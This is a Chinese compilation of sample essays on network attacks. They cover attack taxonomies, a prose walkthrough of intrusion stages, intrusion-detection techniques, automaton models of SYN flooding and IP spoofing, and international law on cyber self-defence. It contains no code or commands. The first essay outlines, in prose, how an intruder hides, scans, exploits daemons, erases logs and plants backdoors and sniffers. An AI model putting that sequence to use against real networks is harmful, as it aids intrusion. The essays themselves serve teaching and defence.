攻击范文10篇

时间:2023-03-19 23:55:43

攻击范文篇1

1、网络扫描--在Internet上进行广泛搜索,以找出特定计算机或软件中的弱点。

2、网络嗅探程序--偷偷查看通过Internet的数据包,以捕获口令或全部内容。通过安装侦听器程序来监视网络数据流,从而获取连接网络系统时用户键入的用户名和口令。

3、拒绝服务-通过反复向某个Web站点的设备发送过多的信息请求,黑客可以有效地堵塞该站点上的系统,导致无法完成应有的网络服务项目(例如电子邮件系统或联机功能),称为“拒绝服务”问题。

4、欺骗用户--伪造电子邮件地址或Web页地址,从用户处骗得口令、信用卡号码等。欺骗是用来骗取目标系统,使之认为信息是来自或发向其所相信的人的过程。欺骗可在IP层及之上发生(地址解析欺骗、IP源地址欺骗、电子邮件欺骗等)。当一台主机的IP地址假定为有效,并为Tcp和Udp服务所相信。利用IP地址的源路由,一个攻击者的主机可以被伪装成一个被信任的主机或客户。

5、特洛伊木马--一种用户察觉不到的程序,其中含有可利用一些软件中已知弱点的指令。

6、后门--为防原来的进入点被探测到,留几个隐藏的路径以方便再次进入。

7、恶意小程序--微型程序,修改硬盘上的文件,发送虚假电子邮件或窃取口令。8、竞争拨号程序--能自动拨成千上万个电话号码以寻找进入调制解调器连接的路径。逻辑炸弹计算机程序中的一条指令,能触发恶意操作。

9、缓冲器溢出--向计算机内存缓冲器发送过多的数据,以摧毁计算机控制系统或获得计算机控制权。

10、口令破译--用软件猜出口令。通常的做法是通过监视通信信道上的口令数据包,破解口令的加密形式。

11、社交工程--与公司雇员谈话,套出有价值的信息。

12、垃圾桶潜水--仔细检查公司的垃圾,以发现能帮助进入公司计算机的信息。

(二)黑客攻击的方法:

1、隐藏黑客的位置

典型的黑客会使用如下技术隐藏他们真实的IP地址:

利用被侵入的主机作为跳板;

在安装Windows的计算机内利用Wingate软件作为跳板;利用配置不当的Proxy作为跳板。

更老练的黑客会使用电话转接技术隐蔽自己。他们常用的手法有:利用800号电话的私人转接服务联接ISP,然后再盗用他人的账号上网;通过电话联接一台主机,再经由主机进入Internet。

使用这种在电话网络上的"三级跳"方式进入Internet特别难于跟踪。理论上,黑客可能来自世界任何一个角落。如果黑客使用800号拨号上网,他更不用担心上网费用。

2、网络探测和资料收集

黑客利用以下的手段得知位于内部网和外部网的主机名。

使用nslookup程序的命令;

通过访问公司主页找到其他主机;

阅读FTP服务器上的文挡;

联接至mailserver并发送请求;

Finger外部主机上的用户名。

在寻找漏洞之前,黑客会试图搜集足够的信息以勾勒出整个网络的布局。利用上述操作得到的信息,黑客很容易列出所有的主机,并猜测它们之间的关系。

3、找出被信任的主机

黑客总是寻找那些被信任的主机。这些主机可能是管理员使用的机器,或是一台被认为是很安全的服务器。

一步,他会检查所有运行nfsd或mountd的主机的NFS输出。往往这些主机的一些关键目录(如/usr/bin、/etc和/home)可以被那台被信任的主机mount。

Fingerdaemon也可以被用来寻找被信任的主机和用户,因为用户经常从某台特定的主机上登录。

黑客还会检查其他方式的信任关系。比如,他可以利用CGI的漏洞,读取/etc/hosts.allow文件等等。

分析完上述的各种检查结果,就可以大致了解主机间的信任关系。下一步,就是探测这些被信任的主机哪些存在漏洞,可以被远程侵入。

4、找出有漏洞的网络成员

当黑客得到公司内外部主机的清单后,他就可以用一些Linux扫描器程序寻找这些主机的漏洞。黑客一般寻找网络速度很快的Linux主机运行这些扫描程序。

所有这些扫描程序都会进行下列检查:

TCP端口扫描;

RPC服务列表;

NFS输出列表;

共享(如samba、netbiox)列表;

缺省账号检查;

Sendmail、IMAP、POP3、RPCstatus和RPCmountd有缺陷版本检测。

进行完这些扫描,黑客对哪些主机有机可乘已胸有成竹了。

如果路由器兼容SNMP协议,有经验的黑客还会采用攻击性的SNMP扫描程序进行尝试,或者使用"蛮力式"程序去猜测这些设备的公共和私有communitystrings。

5、利用漏洞

现在,黑客找到了所有被信任的外部主机,也已经找到了外部主机所有可能存在的漏洞。下一步就该开始动手入侵主机了。

黑客会选择一台被信任的外部主机进行尝试。一旦成功侵入,黑客将从这里出发,设法进入公司内部的网络。但这种方法是否成功要看公司内部主机和外部主机间的过滤策略了。攻击外部主机时,黑客一般是运行某个程序,利用外部主机上运行的有漏洞的daemon窃取控制权。有漏洞的daemon包括Sendmail、IMAP、POP3各个漏洞的版本,以及RPC服务中诸如statd、mountd、pcnfsd等。有时,那些攻击程序必须在与被攻击主机相同的平台上进行编译。

6、获得控制权

黑客利用daemon的漏洞进入系统后会做两件事:清除记录和留下后门。

他会安装一些后门程序,以便以后可以不被察觉地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用,甚至于新文件的大小都和原有文件一样。黑客一般会使用rcp传递这些文件,以便不留下FTP记录。

一旦确认自己是安全的,黑客就开始侵袭公司的整个内部网

7.窃取网络资源和特权

黑客找到攻击目标后,会继续下一步的攻击,步骤如下:

(1)下载敏感信息

如果黑客的目的是从某机构内部的FTP或WWW服务器上下载敏感信息,他可以利用已经被侵入的某台外部主机轻而易举地得到这些资料。

(2)攻击其他被信任的主机和网络

大多数的黑客仅仅为了探测内部网上的主机并取得控制权,只有那些"雄心勃勃"的黑客,为了控制整个网络才会安装特洛伊木马和后门程序,并清除记录。那些希望从关键服务器上下载数据的黑客,常常不会满足于以一种方式进入关键服务器。他们会费尽心机找出被关键服务器信任的主机,安排好几条备用通道。

(3)安装sniffers

在内部网上,黑客要想迅速获得大量的账号(包括用户名和密码),最为有效的手段是使用"sniffer"程序。

黑客会使用上面各节提到的方法,获得系统的控制权并留下再次侵入的后门,以保证sniffer能够执行。

(4)瘫痪网络

攻击范文篇2

[关键词]扫描权限后门

信息网络和安全体系是信息化健康发展的基础和保障。但是,随着信息化应用的深入、认识的提高和技术的发展,现有信息网络系统的安全性建设已提上工作日程。

入侵攻击有关方法,主要有完成攻击前的信息收集、完成主要的权限提升完成主要的后门留置等,下面仅就包括笔者根据近年来在网络管理中有关知识和经验,就入侵攻击的对策及检测情况做一阐述。

对入侵攻击来说,扫描是信息收集的主要手段,所以通过对各种扫描原理进行分析后,我们可以找到在攻击发生时数据流所具有的特征。

一、利用数据流特征来检测攻击的思路

扫描时,攻击者首先需要自己构造用来扫描的IP数据包,通过发送正常的和不正常的数据包达到计算机端口,再等待端口对其响应,通过响应的结果作为鉴别。我们要做的是让IDS系统能够比较准确地检测到系统遭受了网络扫描。考虑下面几种思路:

1.特征匹配。找到扫描攻击时数据包中含有的数据特征,可以通过分析网络信息包中是否含有端口扫描特征的数据,来检测端口扫描的存在。如UDP端口扫描尝试:content:“sUDP”等等。

2.统计分析。预先定义一个时间段,在这个时间段内如发现了超过某一预定值的连接次数,认为是端口扫描。

3.系统分析。若攻击者对同一主机使用缓慢的分布式扫描方法,间隔时间足够让入侵检测系统忽略,不按顺序扫描整个网段,将探测步骤分散在几个会话中,不导致系统或网络出现明显异常,不导致日志系统快速增加记录,那么这种扫描将是比较隐秘的。这样的话,通过上面的简单的统计分析方法不能检测到它们的存在,但是从理论上来说,扫描是无法绝对隐秘的,若能对收集到的长期数据进行系统分析,可以检测出缓慢和分布式的扫描。

二、检测本地权限攻击的思路

行为监测法、文件完备性检查、系统快照对比检查是常用的检测技术。虚拟机技术是下一步我们要研究的重点方向。

1.行为监测法。由于溢出程序有些行为在正常程序中比较罕见,因此可以根据溢出程序的共同行为制定规则条件,如果符合现有的条件规则就认为是溢出程序。行为监测法可以检测未知溢出程序,但实现起来有一定难度,不容易考虑周全。行为监测法从以下方面进行有效地监测:一是监控内存活动,跟踪内存容量的异常变化,对中断向量进行监控、检测。二是跟踪程序进程的堆栈变化,维护程序运行期的堆栈合法性。以防御本地溢出攻击和竞争条件攻击。监测敏感目录和敏感类型的文件。对来自www服务的脚本执行目录、ftp服务目录等敏感目录的可执行文件的运行,进行拦截、仲裁。对这些目录的文件写入操作进行审计,阻止非法程序的上传和写入。监测来自系统服务程序的命令的执行。对数据库服务程序的有关接口进行控制,防止通过系统服务程序进行的权限提升。监测注册表的访问,采用特征码检测的方法,阻止木马和攻击程序的运行。

2.文件完备性检查。对系统文件和常用库文件做定期的完备性检查。可以采用checksum的方式,对重要文件做先验快照,检测对这些文件的访问,对这些文件的完备性作检查,结合行为检测的方法,防止文件覆盖攻击和欺骗攻击。

3.系统快照对比检查。对系统中的公共信息,如系统的配置参数,环境变量做先验快照,检测对这些系统变量的访问,防止篡改导向攻击。

4.虚拟机技术。通过构造虚拟x86计算机的寄存器表、指令对照表和虚拟内存,能够让具有溢出敏感特征的程序在虚拟机中运行一段时间。这一过程可以提取与有可能被怀疑是溢出程序或与溢出程序程序相似的行为,比如可疑的跳转等和正常计算机程序不一样的地方,再结合特征码扫描法,将已知溢出程序代码特征库的先验知识应用到虚拟机的运行结果中,完成对一个特定攻击行为的判定。

虚拟机技术仍然与传统技术相结合,并没有抛弃已知的特征知识库。虚拟机的引入使得防御软件从单纯的静态分析进入了动态和静态分析相结合的境界,在一个阶段里面,极大地提高了已知攻击和未知攻击的检测水平,以相对比较少的代价获得了可观的突破。在今后相当长的一段时间内,虚拟机在合理的完整性、技术技巧等方面都会有相当的进展。目前国际上公认的、并已经实现的虚拟机技术在未知攻击的判定上可达到80%左右的准确率。

三、后门留置检测的常用技术

1.对比检测法。检测后门时,重要的是要检测木马的可疑踪迹和异常行为。因为木马程序在目标网络的主机上驻留时,为了不被用户轻易发现,往往会采取各种各样的隐藏措施,因此检测木马程序时必须考虑到木马可能采取的隐藏技术并进行有效地规避,才能发现木马引起的异常现象从而使隐身的木马“现形”。常用的检测木马可疑踪迹和异常行为的方法包括对比检测法、文件防篡改法、系统资源监测法和协议分析法等。

2.文件防篡改法。文件防篡改法是指用户在打开新文件前,首先对该文件的身份信息进行检验以确保没有被第三方修改。文件的身份信息是用于惟一标识文件的指纹信息,可以采用数字签名或者md5检验和的方式进行生成。

攻击范文篇3

关键词:计算机网络;有限状态自动机;网络攻击

0引言

随着计算机网络的普及应用,网络安全技术显得越来越重要。入侵检测是继防火墙技术之后用来解决网络安全问题的一门重要技术。该技术用来确定是否存在试图破坏系统网络资源的完整性、保密性和可用性的行为。这些行为被称之为入侵。随着入侵行为的不断演变,入侵正朝着大规模、协同化方向发展。面对这些日趋复杂的网络入侵行为,采用什么方法对入侵过程进行描述以便更为直观地研究入侵过程所体现出的行为特征已成为入侵检测技术所要研究的重要内容。显然,可以采用自然语言来描述入侵过程。该方法虽然直观,但存在语义不确切、不便于计算机处理等缺点。Tidwell提出利用攻击树来对大规模入侵建模,但攻击树及其描述语言均以攻击事件为主体元素,对系统状态变化描述能力有限[1,2]。随着系统的运行,系统从一个状态转换为另一个状态;不同的系统状态代表不同的含义,这些状态可能为正常状态,也可能为异常状态。但某一时刻,均存在某种确定的状态与系统相对应。而系统无论如何运行最终均将处于一种终止状态(正常结束或出现故障等),即系统的状态是有限的。系统状态的转换过程可以用确定的有限状态自动机(DeterministicFiniteAutomation,DFA)进行描述。这种自动机的图形描述(即状态转换图)使得入侵过程更为直观,能更为方便地研究入侵过程所体现出的行为特征。下面就采用自动机理论来研究入侵过程的形式化描述方法。

1有限状态自动机理论

有限状态自动机M是一种自动识别装置,它可以表示为一个五元组:

2入侵过程的形式化描述

入侵过程异常复杂导致入侵种类的多种多样,入侵过程所体现出的特征各不相同,采用统一的形式化模型进行描述显然存在一定的困难。下面采用有限状态自动机对一些典型的入侵过程进行描述,尝试找出它们的特征,以寻求对各种入侵过程进行形式化描述的方法。

下面采用有限状态自动机理论对SYN-Flooding攻击等一些典型的入侵过程进行形式化描述。

2.1SYN-Flooding攻击

Internet中TCP协议是一个面向连接的协议。当两个网络节点进行通信时,它们首先需要通过三次握手信号建立连接。设主机A欲访问服务器B的资源,则主机A首先要与服务器B建立连接,具体过程如图1所示。首先主机A先向服务器B发送带有SYN标志的连接请求。该数据包内含有主机A的初始序列号x;服务器B收到SYN包后,状态变为SYN.RCVD,并为该连接分配所需要的数据结构。然后服务器B向主机A发送带有SYN/ACK标志的确认包。其中含有服务器B的连接初始序列号y,显然确认序列号ACK为x+1,此时即处于所谓的半连接状态。主机A接收到SYN/ACK数据包后再向服务器B发送ACK数据包,此时ACK确认号为y+1;服务器B接收到该确认数据包后状态转为Established,至此,连接建立完毕。这样主机A建立了与服务器B的连接,然后它们就可以通过该条链路进行通信[4]。

上面为TCP协议正常建立连接的情况。但是,如果服务器B向主机A发送SYN/ACK数据包后长时间内得不到主机A的响应,则服务器B就要等待相当长一段时间;如果这样的半连接过多,则很可能消耗完服务器B用于建立连接的资源(如缓冲区)。一旦系统资源消耗尽,对服务器B的正常连接请求也将得不到响应,即发生了所谓的拒绝服务攻击(DenialofService,DoS)。这就是SYN-Flooding攻击的基本原理。

SYN-Flooding攻击的具体过程如下:攻击者Intruder伪造一个或多个不存在的主机C,然后向服务器B发送大量的连接请求。由于伪造的主机并不存在,对于每个连接请求服务器B因接收不到连接的确认信息而要等待一段时间,这样短时间内出现了大量处于半连接状态的连接请求,很快就耗尽了服务器B的相关系统资源,使得正常的连接请求得不到响应,导致发生拒绝服务攻击。下面采用有限状态自动机描述SYN-Floo-ding攻击过程。

2.2IP-Spoofing入侵过程

攻击者想要隐藏自己的真实身份或者试图利用信任主机的特权以实现对其他主机的攻击,此时攻击者往往要伪装成其他主机的IP地址。假设主机A为服务器B的信任主机,攻击者Intruder若想冒充主机A与服务器B进行通信,它需要盗用A的IP地址。具体过程[5]如下:

(1)攻击者通过DoS等攻击形式使主机A瘫痪,以免对攻击造成干扰。

(2)攻击者将源地址伪装成主机A,发送SYN请求包给服务器B要求建立连接。

(3)服务器B发送SYN-ACK数据包给主机A,此时主机A因处于瘫痪状态已不能接收服务器B的SYN-ACK数据包。

(4)攻击者根据服务器B的回应消息包对后续的TCP包序列号y进行预测。

(5)攻击者再次伪装成主机A用猜测的序列号向服务器B发送ACK数据包,以完成三次握手信号并建立连接。

分别表示Land攻击、SYN-Flooding攻击和DDoS攻击。通信函数表示为Communication(Res-host,Des-host,Syn-no,Ack-no)。其中Res-host、Des-host分别为源节点和目的节点地址,Syn-no、Ack-no分别为同步和应答序列号。通信及其他函数集具体定义如下:

2.3IP分片攻击

数据包在不同的网络上传输时,由于各种网络运行的协议可能有所差异,不同物理网络的最大传输单元MTU(即最大包长度)可能不同;这样当数据包从一个物理网络传输到另一个物理网络时,如果该网络的MTU不足以容纳完整的数据包,那么就需要利用数据包分解的方法来解决。这样大的数据包往往分解成许多小的数据包分别进行传输。攻击者常常利用这一技术将其攻击数据分散在各个数据包中,从而达到隐蔽其探测或攻击行为的目的[6]。

对于Teardrop等典型的IP分片攻击,其特征是IP包中的ip_off域为IP_MF,而且IP包经过计算,其长度域ip_len声明的长度与收到包的实际长度不同。这样被攻击者在组装IP包时,可能把几个分片的部分重叠起来,某些有害的参数可能被加了进去,从而引起系统状态的异常。

3结束语

攻击过程的形式化描述对于直观地理解各种复杂的攻击过程是相当重要的。实际上无论对于哪一种类型的网络攻击行为,入侵检测系统对其进行检测的过程也就是启动相应的自动机模型对其攻击特征进行识别的过程。鉴于攻击行为的复杂性,很难采用统一的自动机模型识别各种网络入侵行为,目前只能对各个入侵过程构造相应的自动机模型。但各个模型间并不是孤立的,它们之间存在一定的联系,某个模型可能对应另一个模型的某一个状态,或者对应一个状态转移函数,那么,通过构造各种入侵过程的自动机检测模型并灵活地组合它们,就可以检测各种复杂的网络攻击行为。由此可见,自动机理论为网络入侵过程提供了一种有效、直观的形式化描述手段。

参考文献:

[1]TIDWELLT,LARSONR,FITCHK,etal.Modelinginternetattacks:proceedingsofthe2001IEEEworkshoponinformationassuranceandsecurity[C].[S.l.]:[s.n.],2001:54-59.

[2]苏一丹,李桂.基于DFA的大规模入侵建模方法研究[J].计算机工程与应用,2003,39(28):197-199.

[3]蒋总礼,姜守旭.形式语言与自动机理论[M].北京:清华大学出版社,2003.

[4]刘湘辉,殷建平,张玲,等.利用有限状态机分析TCP协议握手过程的安全问题[J].计算机工程与科学,2002,24(4):21-23.

攻击范文篇4

关键词:网络攻击防御入侵检测系统

反攻击技术的核心问题是如何截获所有的网络信息。目前主要是通过两种途径来获取信息,一种是通过网络侦听的途径来获取所有的网络信息,这既是进行攻击的必然途径,也是进行反攻击的必要途径;另一种是通过对操作系统和应用程序的系统日志进行分析,来发现入侵行为和系统潜在的安全漏洞。

一、攻击的主要方式

对网络的攻击方式是多种多样的,一般来讲,攻击总是利用“系统配置的缺陷”,“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止,已经发现的攻击方式超过2000种,其中对绝大部分攻击手段已经有相应的解决方法,这些攻击大概可以划分为以下几类:

(一)拒绝服务攻击:一般情况下,拒绝服务攻击是通过使被攻击对象(通常是工作站或重要服务器)的系统关键资源过载,从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种,它是最基本的入侵攻击手段,也是最难对付的入侵攻击之一,典型示例有SYNFlood攻击、PingFlood攻击、Land攻击、WinNuke攻击等。

(二)非授权访问尝试:是攻击者对被保护文件进行读、写或执行的尝试,也包括为获得被保护访问权限所做的尝试。

(三)预探测攻击:在连续的非授权访问尝试过程中,攻击者为了获得网络内部的信息及网络周围的信息,通常使用这种攻击尝试,典型示例包括SATAN扫描、端口扫描和IP半途扫描等。

(四)可疑活动:是通常定义的“标准”网络通信范畴之外的活动,也可以指网络上不希望有的活动,如IPUnknownProtocol和DuplicateIPAddress事件等。

(五)协议解码:协议解码可用于以上任何一种非期望的方法中,网络或安全管理员需要进行解码工作,并获得相应的结果,解码后的协议信息可能表明期望的活动,如FTUUser和PortmapperProxy等解码方式。

二、攻击行为的特征分析与反攻击技术

入侵检测的最基本手段是采用模式匹配的方法来发现入侵攻击行为,要有效的进反攻击首先必须了解入侵的原理和工作机理,只有这样才能做到知己知彼,从而有效的防止入侵攻击行为的发生。下面我们针对几种典型的入侵攻击进行分析,并提出相应的对策。

(一)Land攻击

攻击类型:Land攻击是一种拒绝服务攻击。

攻击特征:用于Land攻击的数据包中的源地址和目标地址是相同的,因为当操作系统接收到这类数据包时,不知道该如何处理堆栈中通信源地址和目的地址相同的这种情况,或者循环发送和接收该数据包,消耗大量的系统资源,从而有可能造成系统崩溃或死机等现象。

检测方法:判断网络数据包的源地址和目标地址是否相同。

反攻击方法:适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为(一般是丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间,源主机和目标主机的MAC地址和IP地址)。

(二)TCPSYN攻击

攻击类型:TCPSYN攻击是一种拒绝服务攻击。

攻击特征:它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包,当被攻击主机接收到大量的SYN数据包时,需要使用大量的缓存来处理这些连接,并将SYNACK数据包发送回错误的IP地址,并一直等待ACK数据包的回应,最终导致缓存用完,不能再处理其它合法的SYN连接,即不能对外提供正常服务。

检测方法:检查单位时间内收到的SYN连接否收超过系统设定的值。

反攻击方法:当接收到大量的SYN数据包时,通知防火墙阻断连接请求或丢弃这些数据包,并进行系统审计。

(三)TCP/UDP端口扫描

攻击类型:TCP/UDP端口扫描是一种预探测攻击。

攻击特征:对被攻击主机的不同端口发送TCP或UDP连接请求,探测被攻击对象运行的服务类型。

检测方法:统计外界对系统端口的连接请求,特别是对21、23、25、53、80、8000、8080等以外的非常用端口的连接请求。

反攻击方法:当收到多个TCP/UDP数据包对异常端口的连接请求时,通知防火墙阻断连接请求,并对攻击者的IP地址和MAC地址进行审计。

对于某些较复杂的入侵攻击行为(如分布式攻击、组合攻击)不但需要采用模式匹配的方法,还需要利用状态转移、网络拓扑结构等方法来进行入侵检测。

三、入侵检测系统的几点思考

入侵检测系统存在一些亟待解决的问题,主要表现在以下几个方面:

(一)如何识别“大规模的组合式、分布式的入侵攻击”目前还没有较好的方法和成熟的解决方案。从Yahoo等著名ICP的攻击事件中,我们了解到安全问题日渐突出,攻击者的水平在不断地提高,加上日趋成熟多样的攻击工具,以及越来越复杂的攻击手法,使入侵检测系统必须不断跟踪最新的安全技术。

(二)网络入侵检测系统通过匹配网络数据包发现攻击行为,入侵检测系统往往假设攻击信息是明文传输的,因此对信息的改变或重新编码就可能骗过入侵检测系统的检测,因此字符串匹配的方法对于加密过的数据包就显得无能为力。

(三)网络设备越来越复杂、越来越多样化就要求入侵检测系统能有所定制,以适应更多的环境的要求。

(四)对入侵检测系统的评价还没有客观的标准,标准的不统一使得入侵检测系统之间不易互联。入侵检测系统是一项新兴技术,随着技术的发展和对新攻击识别的增加,入侵检测系统需要不断的升级才能保证网络的安全性。

(五)采用不恰当的自动反应同样会给入侵检测系统造成风险。入侵检测系统通常可以与防火墙结合在一起工作,当入侵检测系统发现攻击行为时,过滤掉所有来自攻击者的IP数据包,当一个攻击者假冒大量不同的IP进行模拟攻击时,入侵检测系统自动配置防火墙将这些实际上并没有进行任何攻击的地址都过滤掉,于是造成新的拒绝服务访问。

(六)对IDS自身的攻击。与其他系统一样,IDS本身也存在安全漏洞,若对IDS攻击成功,则导致报警失灵,入侵者在其后的行为将无法被记录,因此要求系统应该采取多种安全防护手段。

总之,入侵检测系统作为网络安全关键性测防系统,具有很多值得进一步深入研究的方面,有待于我们进一步完善,为今后的网络发展提供有效的安全手段。

攻击范文篇5

一、网络攻击构成武力攻击需要满足的条件

使用武力和武力攻击是两个不同的法律概念,分别出现在宪章第2条第4款和第51条之中。很显然,就行使自卫权而言,使用武力不等同于武力攻击。这意味着,并非所有非法使用武力的形式都可视为武力攻击,或者换句话说,并非所有非法武力行为都可以自卫的武力来抵制。[2](P21)然而,不幸的是,现有国际法并没有对基于网络攻击行为是否可以认定为传统意义上的“武力攻击”作出明确的规定。《联合国宪章》第51条的规定只是提到了“武力攻击”一词,没有对什么是“武力攻击”以及构成“武力攻击”的条件包括哪些等问题进行回答。不过,1977年《日内瓦公约第一附加议定书》第49条对于武力攻击的定义和适用范围作出了规定:“一、‘攻击’是指不论在进攻或防御中对敌人的暴力行为。二、本议定书关于攻击的规定,适用于不论在什么领土内的一切攻击,包括在属于冲突一方但在敌方控制领土内的攻击。”可见,基于人道保护的考虑,上述议定书对于什么是武力攻击的行为的要求标准显得比较宽松和包容,只是简单地将“在进攻或防御中对敌人的暴力行为”都视为是武力攻击的行为,而且主要是指在战争中爆发的武力攻击行为,因而一般不能以此作为判断网络攻击是否构成武力攻击的标准。在和平时期,网络攻击构成武力攻击的标准显然要严格得多,因为普通的网络攻击并不能当然地视为武力攻击。但当今时代网络发展的两个特点使得我们不能排除网络攻击构成武力攻击的可能性,这主要因为:一是在现代战争中,各国武器系统的各类平台越来越多地依赖于软件、计算机硬件和战场网络,因而也易受到来自网络的攻击。虽然这些武器系统的安全措施也在随着网络技术的发展和使用而不断加强,但它们受到网络攻击的可能性也越来越大,一旦遭受网络攻击,其后果将会变得不可预测。二是当今的网络系统日益发达,互联互通已经变得相当普遍,民用网络基础设施系统和军用网络设施系统的界限也变得日益模糊,在这种情况下,基于网络攻击导致的破坏性同样难以预知。有学者认为,电脑攻击作为一种“武力攻击”,它的密度和后果在严重性上应当同传统武力攻击造成的后果相同。也就是说,外国发动的、一时扰乱另一国家当地电话公司,造成一小部分人不能使用电话服务的活动不能和“武装进攻”相提并论。相反,故意更改化学或生物公司的控制系统,从而导致大量有毒气体扩散到人口稠密区的电脑攻击,很可能被认为与武装进攻相同。[3](P863)自卫权是由武力攻击而非使用武力所引起的这一事实清楚说明,达到武力攻击门槛的使用武力应当具有最严重的性质,如造成人员伤亡或重大财产损失,只有具有最严重性质的使用武力才构成武力攻击,反之则不能视为武力攻击。[2](P22)1986年国际法院在“尼加拉瓜一案”中指出,武力攻击不仅包括一国的正规部队越过国际边界的直接攻击行为,而且,还包括一国派遣或代表该国派遣武装团队或雇佣兵到另一国的间接攻击,如果他们在另一国内进行武力行为的严重性等同于正规部队进行的实际武力攻击的话。[4](PP103-104)因此,如果一个网络攻击为一个国家的政府部门或军方直接或间接所为,并且是一种非常严重的使用武力行为,同时导致了有关国家人员和财产大规模伤亡或巨大伤害,则该网络攻击行为应该视为武力攻击。

二、网络武力攻击的实施者一般应是国家

2011年5月16日,美国政府公布了一份题为《网络空间国际战略》的文件。这份文件称美国将通过多边和双边合作确立新的国际行为准则,加强网络防御的能力,减少针对美国政府、企业,尤其是对军方网络的入侵。在这份文件中,美国高调宣布“网络攻击就是战争”,并且,美国还表示,如果网络攻击威胁到美国国家安全,将不惜动用军事力量。然而,在实践中,“网络攻击就是战争”的结论并不能轻易地做出。如何区分来自政府和普通黑客的网络攻击?如果处理不当,将导致自卫权行使的无针对性,进而导致防卫对象错误,由此将引发严重后果。如一国军方黑客调用他国导弹程序攻击第三国,在这种情况下责任如何分担?自卫权具体如何行使?一般地,在一个国家行驶自卫权之前必须弄清楚攻击的来源或确定实施攻击行为的主体。对于一个国家军方网站或政府网站受到网络攻击的问题,我们如何能确定到底是谁施加了这样一个“攻击行为”?是某个国家的军方人士?还是一个恶作剧的黑客?或者是一个普通的网民?抑或是一个恐怖主义团体?非常明显的一个事实是,依据《联合国宪章》的有关规定,在国际法上行使自卫权的主体应是国家而非个人。因而个人实施的网络攻击行为一般不能构成国家行使自卫权的理由,这就需要着重考虑某个网络攻击行为是由单个黑客所为,还是犯罪团伙或者政府的故意操纵行为。当然,如果有充分的证据表明,黑客或其它个人对他国网络实施的攻击行为是由政府或军方幕后指使做出的,这种个人实施的一般性网络攻击行为就可以归因于国家行为,从而也可能引发受害国行使自卫权。然而,棘手的问题是,在实践中要分析和确认网络中袭击者的具体身份到底是个人还是国家是非常困难的,因为大量案例表明,大规模网络攻击大多是借助成千上万的“跳板机”①经过多次跳转最终实现攻击的,而跳板机可能遍布世界各地。因此,要想确定攻击源头是政府、军方还是普通民间黑客组织所实施的网络攻击行为实际是非常困难的。

三、联合国任何会员国受武力攻击时

依据宪章第51条的规定,有关国家行使自卫权的恰当时机应是“受武力攻击时”。笔者以为,对于“受武力攻击时”这个限制性词句的解释无非包括三种情形:一是武力攻击已经开始发生的时候(正在进行时);二是武力攻击已经发生并已经完成的时候(过去完成时);三是武力攻击即将发生的时候(一般将来时),不包括潜在的攻击或威胁。对于第一种情况,只要被攻击的国家在他国发动网络武力攻击时能准确识别攻击者的身份,一般在安理会没有正式采取必要办法之前就可以行使自卫权,这点倒没有多大争议。而后两种情况在实践中还比较复杂,因而存在一定的争议。对于第二种情况,自卫权的行使一般认为是不被允许的,主导性的观点认为,自卫必须是对于一个正在发生的武力攻击即刻做出反应,“因为在遭到武力攻击后立即采取的行动才可以证明是必要的,而倘若拖延数月甚至数年之后再采取反击就不是必要的了,毕竟自卫的目的不是为了惩罚对方,而是旨在击退或阻止对方的武力攻击”[5](P290)。但这个条件在运用时必须具有灵活性,特别是在网络攻击的情况下。应该十分谨慎的是,当遭受网络武力攻击的一方在进行自卫时必须首先对攻击者身份进行识别,在确定攻击者身份为合法攻击目标后可进行自卫反击。假如一个国家的军事计算机网络系统在受到网络攻击后不能做出反应,这可能需要一定的时间来进行反击。而且,入侵者在网络攻击中使用了逻辑炸弹或时间炸弹,在网络攻击后导致了实际的损害,这可能会延迟受害国的反应时间。[6](P120)因此,在应对诸如网络武力的新兴攻击时,有关受害国自卫权的行使在时间上实际可以适当延后,但也不能拖延太久,这主要应取决于当时的具体情况。对于第三种情况,之所以在学界引起巨大的争议,其主要原因在于:在实践中,在有效防止自卫权的滥用和充分保护武力攻击受害者的国家安全之间进行平衡实际是一件很困难的事情。目前,比较一致性的观点是,“虽然预防性自卫行动通常是非法的,但是,并不是在一切情况下都是非法的,问题决定于事实情况,特别是威胁的严重性和先发制人的行动有真正必要而且是避免严重威胁的唯一方法;预防性自卫可能比其他情形更加需要符合必要和比例的条件”[7](P310)。美国于2011年2月15日出台了《国防网络安全战略》,该战略是美军网络司令部成立以来出台的第一份总纲式文件,美国网络司令部强调,必须发展出有效的探测、监控、攻击能力,积极探讨“跨境先发制人”的可行性。所谓“跨境先发制人”,即在侦测到对方计算机里有针对美国的间谍软件时主动出击并删除之;或以瘫痪对方关键信息基础设施为筹码,威慑并遏制对方可能对美国发动的攻击。[8]然而,先发制人打击的正当性需要谨慎的根据是它所必需的不仅仅是“威胁性风险”的出现,还有“直接的和可能看上去是顷刻而至的危险”。换言之,那威胁必须是明显的、迫近的和可以以各种根据证实的。

四、自卫权行使必须遵循“必要性原则”和“相称性原则”

对于这个问题,宪章第51条并没有提及。路易斯?亨金认为,人们普遍已经接受的一个观点是,单独或集体自卫权应受到“必要性”(Necessity)和“相称性”(Proportionality)的限制,但是,这种自卫权的行使还包括击退武力进攻以及为了有效终止此类进攻并防止类似情况再次发生而对侵略国发动战争的权利。[10](P45)对于必要性原则,“如果一个迫在眼前的侵犯行为或一个已经开始的侵犯行为的继续,可以不用侵犯另一个国家的方法加以阻止或补救,那么,受威胁的国家对另一个国家的侵犯就是不必要的,因此不是可以被宽恕或正当的。”[7](P310)另外,虽然宪章第51条并未明示提到“相称性”问题,但是在联合国体制下,“相称性原则”应更严格地予以遵守。自卫权在宪章中作为使用武力的一般禁令的例外这一事实,要求使许可使用的武力至最低之必要限度。[11](P239)无论如何,基于网络的日益普及和现代政治、经济、社会生活高度依赖网络这一事实以及网络武力攻击产生的巨大破坏性和不可预知的危险性,较之于应对常规武力攻击,在网络环境中为应对网络武力攻击行为而采取的自卫权行为更需要严格遵守必要性原则和相称性原则。另外,还需要考虑的一个问题是,受到网络攻击的国家是否能用现实的武力来进行自卫?2011年6月4日,美国国防部长盖茨在于新加坡召开的亚洲安全会议上发表演讲,就曾经首次表明在确认遭到来自他国的网络攻击时,将“视之为战争行为并予以(武力)还击”。确实,大量的法律支持这种观点,一个国家有一种内在的使用武力的权力去反对不属于传统的武力攻击。这种观点被联合国大会关于侵略的定